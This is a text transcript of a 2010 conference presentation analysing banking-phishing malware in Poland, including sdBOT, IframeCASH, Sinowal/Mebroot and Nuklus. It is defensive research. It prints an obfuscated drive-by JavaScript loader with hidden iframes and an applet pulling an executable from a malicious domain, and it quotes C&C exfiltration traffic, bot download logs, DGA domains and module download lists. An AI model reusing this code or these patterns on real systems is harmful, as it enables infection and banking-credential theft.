phishing (main malware phishing cases in poland) tomasz sawiak tomasz.sawiak (at) safecomp.com...
Post on 19-Dec-2015
225 views
TRANSCRIPT
Phishing
(main malware phishing cases in Poland)
Tomasz Sawiak
tomasz.sawiak (at) safecomp.com
Agenda
Introduction Popular transaction authorization
methods Phishing scenarios Phising roles Phishing malware cases in Poland Summary Ideas for the future
CONFIDENCE 2010 2
Phishing
Stealing credentials on sea of unconscious Internet users
CONFIDENCE 2010 3
Internet banking model (components)
CONFIDENCE 2010 4
Operating System
WWW/application server
SSL Channel
Bank servers
Operating System
Customer workstation
Internet Browser
Internet Banking Application
User
Internet transaction authorization process
CONFIDENCE 2010 5
Transakcja bankowości internetowej
Sta
ge IV
Sta
ge II
Sta
ge II
IS
tage
I
D1
User
Communication channel
User side interface
(Internet browser) D2
Bank
D2,Tid
Communication channel D2,Tid
User
D3,Tid’
Bank
D2,Tid
Communication channelAuth(X1)
User D2,Tid
Bank
D4
Auth(X1)
D2,Tid
Bank
Auth(X1) Auth(X2)
User side interface
(Internet browser)
User side interface
(Internet browser)
Main transaction authorization metods
OTP/TAN• paper scratch list• hardware token (syncToken)
Challenge response tokens TDS Transaction data signing (TDS hardware
devices, javatokens, phototan etc.) SMScode PKI
• card• file – client side• file - server side
Static password
CONFIDENCE 2010 6
Many additional solutions
Password masking Pictures against bots DA picture (double authentication picture) JS encryption - additional encryption HTTP form
paremeters Linking auth code with transaction (eg. with IP) Secure browser SMS with transaction confirmation etc.
CONFIDENCE 2010 7
Transaction autorization methods - comparison
0
1
2
3
4
5OTP paper
OTP token
Transaction SMS
TDS device
TDS photo TAN
TDS JavaToken
PKI file
Static password
Security
Easy
CONFIDENCE 2010 8
Process of phishing attack
Phase 1 – Rekonesanse (information gathering)• Passive• Active (+ new account registration)
Phase 2 – Prepare and test attack scenario (malware, design phishing content)
Phase 3 – Phishing attack Phase 4 – Maintaining access to the account (eg.
for multiple payments) – often this stage do not exist
Phase 5 – Clearing tracks (put forward identification that account has been compromised)
CONFIDENCE 2010 9
Attack strenght
Factors that indicates strength of phishing attacks scenario:
Phishing scenario / complex - (attack visibility) identification and recognition (attacks with less sophisticated methods are easier to detect). Quick detection – quick response.
Attack length – time window duration where stolen credential are used by fraudsters (eg. online attack vs offline attack)
Attack personalization Attack scale – huge scale attacks are easier to
detects
CONFIDENCE 2010 10
The way of serving phishing content
Static phishing– eg. link in e-mail
Semi-dynamic– malware redirect to the fake page on phishing server– malware injects the fake page from config file
Dynamic phishing– malware changes content of the page on the fly (eg. Inject fake form
fields for TAN/password into orginal page)– changes banking application flow – additional whole page injection– malware changes transaction on the fly
CONFIDENCE 2010 11
Static phishing
CONFIDENCE 2010 12
There is no context
Semi-dynamic
CONFIDENCE 2010 13
There is context!
Dynamic phishing – MiM/MiB
CONFIDENCE 2010 14
Kill Win and rebootFormat c:Change
historyBlock
chosen sites
Roles in phishing process
CONFIDENCE 2010 15
Who is guilty?
CONFIDENCE 2010 16
Who is guilty – User?
CONFIDENCE 2010 17
Every tansaction authorization
method can fail ;-(
Why phishing with malware is more accurate?
There is context ! Cert /SSL looks like valid Phisihing page contans orginal URL address (mask or inject) Sometimes user can not distinguish phishing content from
orginal bank’s page – it depends on transaction authorization method used
Fake transaction is made with victim’s IP Phishing works with stronger authentication methods - users
do not validate what they sign (SMScode, transsaction confirmation)
More sophisticated methods like MiM (IP?)
CONFIDENCE 2010 18
MIM - Server side vs Client side
CONFIDENCE 2010 19
Famous phishing malware families in Poland
CONFIDENCE 2010 20
IFRAME CASH
ZEUS/ZBOT
SINOWAL/TORPIGMEBROOT
LIMBO
CLOD
MIM2009
BOT
MEBROOT
NUKLUS
MiM/SMS
IRC sdBOT case
IRC scBOT + BHO dll registered with name „Google Toolbar Module” (IE only)
Captures all POST&GET Focused attack on ~60 chosen customers (2 banks)
(their UIDs hardcoded into dll) Chosen users redirected to phishing sites on
compromised WWW servers – then HTTP flow back to original site
IRC server in KOREA (south) – compromised private university’s server with rootkit
(exploited probably with RFI) Dir browsing and stats page (logs publicly avilable) Infected users: ~15K (poland+europe) (2 months) Log size: 1,5 GB
CONFIDENCE 2010 21
IRC sdBOT case – log sample
CONFIDENCE 2010 22
:=====================================2005-09-16-02-36-28:#BEAN::[email protected] JOIN :#bean2005-09-16-02-36-29:#MRBEAN::[email protected] PRIVMSG #mrbean :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/wtrwxcd3.exe to: wtrwxcd3.exe.2005-09-16-02-36-29:#DUDEK2::[email protected] PRIVMSG #dudek2 :Content-Disposition: form-data; name="link_group_edit_title[51773448][52106590]"2005-09-16-02-36-29:#BEAN::[email protected] JOIN :#bean2005-09-16-02-36-30:#BEAN::[email protected] PRIVMSG #bean :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/wtrwxcd3.exe to: wtrwxcd3.exe.2005-09-16-02-36-30:#BEAN::[email protected] PRIVMSG #bean :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/wtrwxcd3.exe to: wtrwxcd3.exe.2005-09-16-02-36-31:#MRBEAN::[email protected] PRIVMSG #mrbean :[DOWNLOAD]: Downloaded 106.1 KB to wtrwxcd3.exe @ 106.1 KB/sec.2005-09-16-02-36-31:#DUDEK2::[email protected] PRIVMSG #dudek2 :URL: http://poczta06.o2.pl/index.php2005-09-16-02-36-31:#DUDEK2::[email protected] PRIVMSG #dudek2 :POST: pn=0&m=&n=395&msgnr=395&marked5B5D=395&cmd=Skasuj� �2005-09-16-02-36-31:#DUDEK2::[email protected] PRIVMSG #dudek2 :=====================================
IRC sdBOT case - logs
CONFIDENCE 2010 23
50%
38%
4%1%1%1%1%
4%
Adres IP
.pl
.net
.de
.co
.com
.fr
pozostałe
59%
7%
4%
3%
3%
24% Polska
Indie
Brazylia
Turcja
USA
Pozostałe
IRC sdBOT case – attacker activity
Capturing one time password for chosen customers (focused attack)
Capturing credit card numbers Logs POST&GET Looking for hosting servers :[SYSINFO]: [CPU]: 2050MHz.
[RAM]: 523,700KB total, 523,700KB free. [Disk]: 2,092,328KB total, 242,876KB free. [OS]: Windows 98 (4.10, Build 67766446). [Sysdir]: C:\WINDOWS\SYSTEM. [Hostname]: nazwa_DNS_hosta (adres_IP). [Current User]: nazwa_użytkownika. [Date]: 16:Oct:2005. [Time]: 22:06:17. [Uptime]: 0d 0h 28m
Searching local discs for certs and private keys in files Searching config files from totalcomander
(encoded passwords to FTP servers) CONFIDENCE 2010 24
IRC sdBOT case
Banks made resistance After 3 months – attacker has resigned from
phishing on polish banks and focused attack on Egold payment system
Server finaly closed at the begining of 2006 Lesson learned
CONFIDENCE 2010 25
IframeCASH
CONFIDENCE 2010 26
Charakterystyczny kod iframe w tytułach serwisów WWW świadczy o ich kompromitacji
IframeCASH
CONFIDENCE 2010 27
yauwvhhzml.biz 81.95.152.229 adv400.php - adv449.php ybrvhgwuzc.biz 81.95.152.230 adv450.php - adv499.php ycgyhedjrz.biz 81.95.153.241 adv500.php - adv549.php ydcvpzmnjd.biz 81.95.153.242 adv550.php - adv599.php yezlbyuzpa.biz 81.95.153.243 adv600.php - adv649.php yfqslqtnfa.biz 81.95.153.244 adv650.php - adv699.php ygqvftewol.biz 81.95.153.245 adv700.php - adv749.php yhjeepttcp.biz 81.95.153.246 adv750.php - adv799.php
http://iframe_domain_name/dl/advXXX.php,
IframeCASH
CONFIDENCE 2010 28
<script>function I(H,v){if(!v)v=' "#()-./0125679:;<=>@ACEGHIJLMPQRSTV_abcdefghijklmnoprstuvwxyz|}';var s;var F='';for(var V=0;V<H.length;V+=4){s=((v.indexOf(H.charAt(V))&255)<<18)|((v.indexOf(H.charAt(V+1))&255)<<12)|((v.indexOf(H.charAt(V+2))&255)<<6)|(v.indexOf(H.charAt(V+3))&255);F+=String.fromCharCode((s&16711680)>>16,(s&65280)>>8,s&255);}eval(F);}</script> <script>I('H.zVMCraJc;[email protected]:VmTJs<v:T0e9s<kGtAiHCvp5cMnIE<a2#0yICHnGCra0/7nGoruL.mSH/Gt9>_jMsrb0/MeH/<d:>)RI.AeHsSp:>)|:#zeHc1SJC@|0T_xH.zVMCraJc;jMt1eM.@d0VmeHc1SJC@RLt1V:CvaMoLv9=vdM.rh0/MeH/<d:>)RI.AeHsSp:>)|:#zeHc1SJC@|0T_xH.zVMCraJc;jMt1eM.@d0VmSL/"hHE;RGE1VI.asH>rfGEHS5beSLT"VJs<a:@MaM)-VGsAoLnvVJ.-oLn"tIC<pI(pm0.SaICMdM(pm:VmlGE1SJ="jGCra:@rkH/AhHA"SM.RRMb-hMC@zI/<pL(dk5tadIbAaL/<pGt jGbaw5s<h5smkGC<aLb-_MVLv9Ayn5bAuH>uy5s-lL.maM(uT2>i_Js7rJCAjM#vtLbapH=RT:.abLb-iH="tIC<pI(pm0.SaICMdM(pm0.1kLb<aLVpl0.HnGCraGbznH.An:> RLt1V:CHeJ.miHCrSH/Gt9>_jI/<i:VlkICHnGCra:T0e9s<kGtAiHCvp5cMnIE<a2#0yICHnGCra0/MeH/<d:>)RI.AeHsSp:>)RGbznH.An:> RHc1SJCATJt1_HE0z6#"oLb6zHbahJ.raJC-_MVLv9=vdM.p|:#zeHc1SJC@|0T_xH.zVMCraJc;jMt1eM.@d0VmeHc1SJC@RMsa_M.Rz6="dHCacI/;z6="TJt1_HE0z6#"bLb-iHC1kLb<aLVpl0/7nGorbICmhJCAiGC<s7o_v5bSpJ>uy5sabLb-iH>uT2>i_Js7rJCAjM#vtLbapH=RT:.abLb-iH="tIC<pI(pm0.SaICMdM(pm0.1kLb<aLVpl0.HnGCraGbznH.An:> RLt1V:CHeJ.miHCrSH/Gt9>_jI/<i:VlkICHnGCra:T0e9s<kGtAiHCvp5cMnIE<a2#0yICHnGCra0/MeH/<d:>)RI.AeHsSp:>)RGbznH.An:> RHc1SJCATJt1_HE0z6#"oLb6zHbahJ.raJC-_MVLv9=vdM.p|:#zeHc1SJC@|0T_xH.zVMCraJc;jMt1eM.@d0VmeHc1SJC@RMsa_M.Rz6="dHCacI/;z6="TJt1_HE0z6#"bLb-iHC1kLb<aLVpl0/7nGorbICmhJCAiGC<s7o_v5bSpJ>uy5sabLb-iH>uT2>i_Js7rJCAjM#vtLbapH=RT:.abLb-iH="tIC<pI(pm0.SaICMdM(pm0.1kLb<aLVpl0.HnGCraGbznH.An:> RLt1V:CHeJ.miHCrSH/Gt9>_jI/<i:VlkICHnGCra:T0e9s<kGtAiHCvp5cMnIE<a2#0yICHnGCra0/MeH/<d:>)RI.AeHsSp:>)RGbznH.An:> RHc1SJCATJt1_HE0z6#"oLb6zHbahJ.raJC-_MVLv9=vdM.p|:#zeHc1SJC@|0T_xH.zVMCraJc;jMt1eM.@d0VmeHc1SJC@RMsa_M.Rz6="dHCacI/;z6="TJt1_HE0z6#"bLb-iHC1kLb<aLVpl0/7nGorTGCLjI/<i:VlkICHnGCra:T0e9s<kGtAiHCvp5cMnIE<a2#0yGE"lJ.Ap0/MeH/<d:>)RI.AeHsSp:>)R;A1(=)aC<>rhJs-_HE1SH/Gt9>_jIb-n0.7kH.@z;szrJc<aLVuy5p-;@)m-A(uT2>i_Js7rJCAjM#vtLbapH=RT:#zTJs<v:VlkI/<iJ(uT2>h ')</script>
document.write("<html><body>"); document.write("<iframe src=xpladv799.wmf width=1 height=1></iframe>"); document.write("<iframe src=new799.html width=1 height=1></iframe>"); document.write("<applet archive=java.jar code=GetAccess.class width=1 height=1> <param name=ModulePath value=http://yhjeepttcp.biz/dl/loaderadv799_2.exe></applet>"); document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>"); document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>"); document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>"); document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>"); document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>"); document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>"); document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>"); document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>"); document.write("<iframe width=1 height=1 border=0 frameborder=0 src=bag.htm></iframe>"); document.write("<applet width=1 height=1 ARCHIVE=loaderadv799.jar code=Counter></APPLET>"); document.write("</body></html>");
CVE-2004-0380 CVE-2005-2123 CVE-2005-2124 CVE-2005-1790 CVE-2006-0003 CVE-2006-3730 CVE-2006-4868
IframeCASH
CONFIDENCE 2010 29
Sinowal/mebroot
Malware components:• Exe loader (ibm0000n.exe) with static key in registry – later
msasvc.exe (service: „Microsoft Authenticate Service”) • 2 dlls (ibm0000n.dll, ibm000n+1.dll) - main malware components• $_2341233.tmp - capture data history• $_2341234.tmp - config file with attacked domains• $_2341235.tmp - timestamp - last sync with dropzone
Backend (2 different components)• C&C and dropzone• Phishing server
CONFIDENCE 2010 30
Sinowal – phishing behaviour
1. User opens original banking site
2. Malware check if URL domain exist in config file
3. Malware asks phishing server what is the phishing page content and conditions that should be met – when phishing page should be presented
4. When phishing condition is meet – malware injected the phishing page (flow) eg. after logon page or during payment confirmation (context)
5. Stolen data were sent to the phishing server
6. User continues using original internet banking page
CONFIDENCE 2010 31
Sinowal (communication channel)
CONFIDENCE 2010 32
POST /XFsQa5/d9FX98404tcGW0JAJ2XXJ6cS4wK1ViJSJhHlAx/OP8VTFHJSa+J2FsY+diEHZdcXpxLSNlDnRtcnEVVXewsLQAIkUuIPdlMns3pSkAKAo2NjI1NGkFN2I3HBtcd8WxwXJSMCBWsyJWVzaiUHcFKmN1ZSI7ZQIDJSlgSg HTTP/1.1 Content-Type: multipart/form-data; boundary=swefasvqdvwxff Host: rafer71.com Content-Length: 1000 User-Agent: MSID [17A1811109ACDF54EA05C4AAEB6D888C]|148a|76 Cache-Control: no-cache
--swefasvqdvwxff--- Content-Disposition: form-data; name=datafile; filename="data.str"Content-Type: application/octet-stream MZd2Rs5316dH6mZVJhCj5wNmN8aF8gejYtRwEh/KrkQnANfD7scH03dft3SyYQOik6NHQjTGs+JCBXHCmC6uBWfhdkbOd9enR+pmVSYQo+cDZjfGhfIHo2LUcBIfyq5EJwDXw+7HB9N3X7d0smEDopOjR0I0xrPiQgVxwpgPjqWn83XiHydTUuMeFyRDJGOilgcXMrDyhwenZaACbh/K1TYhdqfK58cH0n4ntXOwEgLTl9JCNEOzs+ZFcQO+mP7VJ+EGx77iFidSb9eQAmEyx4OHdtdkogcXYrCgQy4PrrHnwXfTf1fHBsYed9WSpEJDMrPClkRzBsflkQWyWusbtVPkUsdaFicVxq8HVWGVIxJyIyajBWKVkmJUVJd+rg6FB1WSd64H98dS6mYVI7BX53K3UiahV5JmEyUxJut+rnX3MCMWbqYn9zcv1wUSkOYzY3ZSAjTCB6fTNeUCHz/Lhfdxoxaud2cWwq9GVXPQx+Kzd9JyJcJ2t2J0oJLaT080w8XiNn92t5HC/0ahZ7DXQzI2wsfgMwYGw+LmYi4fTnSHEFfnjsfHF5DsV8AHVYCUBmLSFqFno0JWQDPQODgoiGWVgEB4YfVlFC2FtoDSIeARtITBt/AEFLHicqBszQ0HFMM0BA0lNHQFPOGBsoACIsODlsOVwafXM7Tw1D++P6G2YQfXrsP3NtIat6EnRSNz4nfGMrHG4kYCBbDnH24ftfcwxmU6dmfXF28GpdDm9/aj10bDhaSzh0KgFbLaWztVdpB3xz
POST /XFsQa5/id=17A1811109ACDF54EA05C4AAEB6D888C&sv=76& build=148a&ts=1130334165&ip=10.5.2.24&sport=9880&hport=9896&os=5.1.2600&cn=Poland HTTP/1.1 0x07 0x00 0x17 0x1c *E 0xac 0x00 0x00 0x00 IP 10.5.2.24 0x0a [148a] 0x0a Internet Explorer:http://poczta06.o2.pl/ 0x09 login,, 0x0a Internet Explorer:http://poczta06.o2.pl/index.php 0x09 login_moj,haslo, 0x0a PSTPASSWORDS_END 0x0a OUTLOOK_EMAIL_LABEL 0x05 0x04 0x17 0x1c *E 0xbc 0x01 0x00 0x00 IP 10.5.2.24 0x0a [148a] 0x0a bookmarksgrab 0x0d 0x0a http://www.o2.pl/ 0x0a http://www.microsoft.com/isapi/redir.dll?prd=windows&sbp=mediaplayer&plcid=&pver=6.1&os=&over=&olcid=&clcid=&ar=Media&sba=RadioBar&o1=&o2=&o3= 0x0a http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=hotmail 0x0a http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=CLinks 0x0a http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=windowsmedia 0x0a http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=windows 0x0a 0x00
POST /XFsQa5/id=17A1811109ACDF54EA05C4AAEB6D888C&sv=76& build=148a&ts=1130334165&ip=10.5.2.24&sPOST /XFsQa5/id=17A1811109ACDF54EA05C4AAEB6D888C&sv=76& build=148a&ts=1130334165&ip=10.5.2.24&sport=9880&hport=9896&os=5.1.2600&cn=Poland HTTP/1.1port=9880&hport=9896&os=5.1.2600&cn=Poland HTTP/1.1
id – infected host UID - (MD5)sv – source version (eg. Sv=76)build – eg. build=148, VASI etc.ts - timestampip - IP addresssport- SOCS porthport – HTTP proxyos – OS versioncn – country name
Sinowal analysis
CONFIDENCE 2010 33
Sinowal code samples
Nazwa pliku DataRozmiar kodu SV Build MD5
ibm00001.dll 13-12-2005 11:05:28 0xbe00 43 143a EFEDB035686CED40E05BD3BC7469D4B5
ibm00002.dll 13-12-2005 11:05:41 0x8600 43 143a CF1E33D5E361BB6E24484F98F26180D5
ibm00001.dll 3-03-2006 10:59:46 0xbe00 52 148a 912DEE8DD3C1375EB703D41BABDE52D7
ibm00002.dll 3-03-2006 10:59:08 0x9600 52 148a DB417C3FD237F0A9D2E69BA133706EAA
ibm00001.dll 16-03-2006 10:31:52 0xbe00 53 148a 8AFB0A95688D99B4480A2BD955C84DD9
ibm00002.dll 16-03-2006 10:32:03 0x9800 53 148a 45A5B3C582C3CB6A75DAAD0407D9E758
ibm00001.dll 3-04-2006 13:26:54 0xbe00 53 Build VASi BC8B7727288C748AF15BC0468C91C730
ibm00002.dll 3-04-2006 13:27:08 0xA600 53 Build VASi 31808811E25DC4882DE86CE4F43E85F3
ibm00001.dll 4-04-2006 12:01:25 0xbe00 54 Build VASi 5C3666B84C2E9DB151F661701EF98916
ibm00002.dll 4-04-2006 12:01:30 0xA400 54 Build VASi E6C9CE1ACEB7B2D2E9D59C1A3B86ED51
ibm00001.dll 16-05-2006 10:35:14 0xbe00 56 testtraf1 725D108B17234095342673E2B0516794
ibm00002.dll 16-05-2006 10:35:20 0xA600 56 testtraf1 43A87DE41A28439562EFFE38977AAA3A
ibm00001.dll 29-05-2006 15:28:53 0xbe00 58 Build VASi 66886BD2508C4970B343858EBB17920F
ibm00002.dll 29-05-2006 15:28:59 0xA600 58 Build VASi 5A4C2AB7681FADDF53D996E18D40A4AC
ibm00001.dll 02-06-2006 07:25:32 0xc000 58 148a 1A9198A711167100BD2E8241CD68EEE1
ibm00002.dll 02-06-2006 07:25:39 0xA800 58 148a 5B30BFF16F0B829EAB42884A94E0AE6A
ibm00001.dll 20-07-2006 12:12:09 0xD200 66 Build VASi 726D8311E39CACC54F6F4DF367B07B03
ibm00002.dll 20-07-2006 12:12:16 0xA200 66 Build VASi ADD68075F8F46FC4ABC8D436B2083B3A
ibm00001.dll 10-07-2006 08:48:24 0xD200 60 148a F2BE85309541A4EED5482C1041F24D29
ibm00002.dll 10-07-2006 08:48:31 0xA200 60 148a 1EF5A3AC9A8BEBFE88C07F03027A4ACD
ibm00001.dll 27-07-2006 14:36:59 0xD400 69 Build VASi 71D0C299F784E32F516472318CD5EDA0
ibm00002.dll 27-07-2006 14:37:05 0x9E00 69 Build VASi E38ECCA490886C179D05C43F4934A8E3
ibm00001.dll 29-07-2006 14:06:28 0xD600 70 148a 5C5945373C2A2461031C54CAD0EA9779
ibm00002.dll 29-07-2006 14:06:35 0x9E00 70 148a DEEC1012FC99156BFFB143832B6FCF10
ibm00001.dll 22-08-2006 14:35:50 0xD200 73 Build VASi F90A928B986E78684EFFED9F62C02657
ibm00002.dll 22-08-2006 14:35:57 0xAC00 73 Build VASi 18E527E2ABC2344A6A83F8194445FDCA
ibm00001.dll 22-08-2006 14:29:33 0xD200 73 148a 848857B19D418CFFDA88EFD21622662D
ibm00002.dll 22-08-2006 14:29:40 0xAC00 73 148a EBB833EB3F06B0896925650512D6F506
ibm00001.dll 22-09-2006 8:27:29 0xD400 75 Build VASi DE7C9CAA1ACA41A071C14104D5417E9D
ibm00002.dll 22-09-2006 8:27:37 0xAC00 75 Build VASi DFDFD334787489354BFAA4CFD43D7DC6
ibm00001.dll 29-09-2006 16:04:17 0xD400 76 148a D2349718FC632127CC65F43FD63795F9
ibm00002.dll 29-09-2006 16:04:23 0xAE00 76 148a C4549F5BED962F90B804720FC4ED87AD
ibm00001.dll 10-10-2006 08:57:23 0xD400 77 Build VASi 0CACAF29B970D8BADD8D57DDCCEE163A
ibm00002.dll 10-10-2006 08:57:31 0xAE00 77 Build VASi BD38553E02531BFDB341A735E36A3FD5
Ibm00001.dll 20-10-2006 10:37:09 0xD200 80 149 D3EB4B6C492EA6654A29B271A8D89385
Ibm00002.dll 20-10-2006 10:37:17 0xAE00 80 149 EEEACBFF9B43503140F2E5B8316E823F
Ibm00001.dll 11-11-2006 17:40:16 0xD400 82 Build Vasi3 3ED23CA6CAD63822CEADD9974850F9AB
Ibm00002.dll 10-11-2006 17:39:57 0xB000 82 Build Vasi3 2A0935310C457DD7488A417FEDCC66CE
Ibm00001.dll 14-11-2006 13:38:20 0xD200 83 Build Vasi3 EE07FCE33D6C9C43AED852CA84DF330D
Ibm00002.dll 14-11-2006 13:38:04 0xB000 83 Build Vasi3 485E44A5A98B8C3F134C8EF80D2553F7
Ibm00001.dll 19-12-2006 11:47:46 0xCE00 86 150 3B63153B213981259B399F4448B4185E
Ibm00002.dll 19-12-2006 11:46:40 0xB600 86 150 15A815346B10A692C6994293BD319F2A
Ibm00001.dll 21-12-2006 14:59:03 0xCE00 86 150 C4173660AD3B8BE13E4D29175D60ACAB
Ibm00002.dll 21-12-2006 14:58:20 0xB600 86 150 84A2AD4A0F64A0179249392FC8D1B55A
CONFIDENCE 2010 34
Sinowal – API functions
Malware API functions• MS Internet Explorer
– InternetConnect()– HTTPOpenRequest()– HTTPSendRequest()– InternetReadFile()– InternetCloseHandle()– CertGetCertificateChain()– CertVerifyCertificateChainPolicy()
• Mozilla– PR_Connect()– PR_Read()– PR_Write()– PR_Close()
CONFIDENCE 2010 35
API functions for other processes:Cryptography:
• CryptImportKey()• CryptEncrypt()• CryptDecrypt()• CryptDestroyKey()• CryptGenKey()• CryptGetUserKey()• CryptDeriveKey()
Network:
Connect()Send()Recv()WSASend()WSARecv()CloseSocket()
Sinowal -> Mebroot
Changes:• Instalation process• MBR• No dlls –> disk driver + rootkit• Different encryption of communication channel to dropzone
Phishing functions and comunication to phisihng server almost the same
CONFIDENCE 2010 36
Sinowal/mebroot - hacked (end of 2009)
CONFIDENCE 2010 37
POST / HTTP/1.1 Host: gduwuxci.com Content-Length: 108 Connection: close .]..KV.HW.2.v.?~...g...|.[2.H.-.Zb.om....v8...F......kv..............!o.......}........j...0W.."0.h.w^&.....HTTP/1.1 200 OK Date: Mon, 17 Nov 2008 21:18:28 GMT Server: Apache X-Powered-By: PHP/5.2.5 Set-Cookie: PHPSESSID=acaac67350d15671cc339bef5d29b2bc; path=/ Connection: close Transfer-Encoding: chunked Content-Type: text/html 81 Could not connect to database 'rcmvjrjt_sope1' (localhost). Your database server may be down or your database setup may be wrong. 0
More than 300 000 uniqe banking accounts
MEBROOT – domain generator algorithm
Mon Oct 20 2008 10:10:26 GMT+0200 ; 2008-10-19;bnigcketn.com Tue Oct 21 2008 10:10:26 GMT+0200 ; 2008-10-19;bnigcketn.com Wed Oct 22 2008 10:10:26 GMT+0200 ; 2008-10-19;bnigcketn.com Thu Oct 23 2008 10:10:26 GMT+0200 ; 2008-10-17;jlgvcketn.com Fri Oct 24 2008 10:10:26 GMT+0200 ; 2008-10-17;jlgvcketn.com Sat Oct 25 2008 10:10:26 GMT+0200 ; 2008-10-17;jlgvcketn.com Sun Oct 26 2008 10:10:26 GMT+0100 ; 2008-10-26;amhvcketn.com Mon Oct 27 2008 10:10:26 GMT+0100 ; 2008-10-26;amhvcketn.com Tue Oct 28 2008 10:10:26 GMT+0100 ; 2008-10-26;amhvcketn.com Wed Oct 29 2008 10:10:26 GMT+0100 ; 2008-10-26;amhvcketn.com Thu Oct 30 2008 10:10:26 GMT+0100 ; 2008-10-24;ikfjcketn.com Fri Oct 31 2008 10:10:26 GMT+0100 ; 2008-10-24;ikfjcketn.com Sat Nov 01 2008 10:10:26 GMT+0100 ; 2008-11-1;bov2bllev.com Sun Nov 02 2008 10:10:26 GMT+0100 ; 2008-11-2;cpw3bllev.com Mon Nov 03 2008 10:10:26 GMT+0100 ; 2008-11-2;cpw3bllev.com Tue Nov 04 2008 10:10:26 GMT+0100 ; 2008-11-2;cpw3bllev.com Wed Nov 05 2008 10:10:26 GMT+0100 ; 2008-11-2;cpw3bllev.com Thu Nov 06 2008 10:10:26 GMT+0100 ; 2008-11-0;anu1bllev.com Fri Nov 07 2008 10:10:26 GMT+0100 ; 2008-11-0;anu1bllev.com Sat Nov 08 2008 10:10:26 GMT+0100 ; 2008-11-0;anu1bllev.com Sun Nov 09 2008 10:10:26 GMT+0100 ; 2008-11-9;jwdabllev.com Mon Nov 10 2008 10:10:26 GMT+0100 ; 2008-11-9;jwdabllev.com Tue Nov 11 2008 10:10:26 GMT+0100 ; 2008-11-9;jwdabllev.com Wed Nov 12 2008 10:10:26 GMT+0100 ; 2008-11-9;jwdabllev.com Thu Nov 13 2008 10:10:26 GMT+0100 ; 2008-11-7;jcwpbllev.com Fri Nov 14 2008 10:10:26 GMT+0100 ; 2008-11-7;jcwpbllev.com Sat Nov 15 2008 10:10:26 GMT+0100 ; 2008-11-7;jcwpbllev.com Sun Nov 16 2008 10:10:26 GMT+0100 ; 2008-11-16;ehbpbllev.com Mon Nov 17 2008 10:10:26 GMT+0100 ; 2008-11-16;ehbpbllev.com Tue Nov 18 2008 10:10:26 GMT+0100 ; 2008-11-16;ehbpbllev.com Wed Nov 19 2008 10:10:26 GMT+0100 ; 2008-11-16;ehbpbllev.com Thu Nov 20 2008 10:10:26 GMT+0100 ; 2008-11-14;gjddbllev.com Wed Dec 03 2008 10:10:26 GMT+0100 ; 2008-12-0;esy1amtwe.comCONFIDENCE 2010 38
Sinowal
CONFIDENCE 2010 39
Nuklus
Non encrypted communication channel -> C&C dll modules for IE (BHO) and Mozilla Injects HTTP phishing content Capture certs and private keys
CONFIDENCE 2010 40
Nuklus modules
%SystemRoot%/IEMod.dll %SystemRoot%/IEGrabber.dll %SystemRoot%/IEFaker.dll %SystemRoot%/CertGrabber.dll %SystemRoot%/PSGrabber.dll %SystemRoot%/FFGrabber.dll %SystemRoot%/IEScrGrabbe.dll %SystemRoot%/ProxyMod.dll %SystemRoot%/ExeLoader.dll %SystemRoot%/IETanGrabber.dll %SystemRoot%/NetLocker.dll %SystemRoot%/IECertGrab.dll %SystemRoot%/IEKeyLogger.dll %SystemRoot%/IEFileGrabber.dll %SystemRoot%/IEInjector.dll
CONFIDENCE 2010 41
NUKLUS
CONFIDENCE 2010 42
NUKLUS vuln
/userlist.txt /mail_log.txt /script_log.txt
CONFIDENCE 2010 43
NUKLUS log monitoring
CONFIDENCE 2010 44
NUKLUS – sample communication
CONFIDENCE 2010 45
POST /pl/main.php?aa6b9ba2 HTTP/1.1Host: 213.133.102.57Content-Type: multipart/form-data; boundary=--__abcd-ijkl-xyz789__--Content-Length: 200Connection: Close
----__abcd-ijkl-xyz789__--Content-Disposition: form-data; name="conf“Kernel:3;----__abcd-ijkl-xyz789__--Content-Disposition: form-data; name="LastCommand“----__abcd-ijkl-xyz789__----
HTTP/1.1 200 OK
l http://213.133.102.57/pl/modules/browser_mon.dlll http://213.133.102.57/pl/modules/CertGrabber.dlll http://213.133.102.57/pl/modules/FFMod.dlll http://213.133.102.57/pl/modules/FTPSniffer.dlll http://213.133.102.57/pl/modules/IEMod2.dlll http://213.133.102.57/pl/modules/NetLocker.dlll http://213.133.102.57/pl/modules/ProxyMod.dlll http://213.133.102.57/pl/modules/PSGrabber.dlll http://213.133.102.57/pl/modules/SysInfo.dlll http://213.133.102.57/pl/modules/CertGrabber.dlll http://213.133.102.57/pl/modules/FFMod.dlll http://213.133.102.57/pl/modules/FTPSniffer.dlll http://213.133.102.57/pl/modules/IEMod2.dlll http://213.133.102.57/pl/modules/NetLocker.dlll http://213.133.102.57/pl/modules/ProxyMod.dlll http://213.133.102.57/pl/modules/PSGrabber.dlll http://213.133.102.57/pl/modules/SysInfo.dll
Config update…
e bancaonline.openbank.es/servlet/PProxy?app=DJ&cmd=8000p enlaza.cajadeburgos.es/BELLogin.jspe cajacirculo.es/ISMC/Circulo/acceso.jspe bbva.es/TLBS/tlbs/jsp/esp/home/index.jspe extranet.banesto.es/npage/loginParticulares.htme banesnet.banesto.es/npage/loginEmpresas.htmp bancopopular.es/AppBPE/servlet/servin?p_pf=c&p_id=esp&p_pm=bo&e bancaonline.openbank.es/servlet/PProxy?cmd=8000
… and config for 8 polish banks ….
Limbo/NetHell
Phishing content on compromised WWW servers or Additional phishing content - WebInjects (from
config file) Phishing content for (67 sites):
• Spain – 42 sites• Portugal - 16 sites• Poland – 9 sites
Phishing page contains triger (helperred.php – form on phishing site)
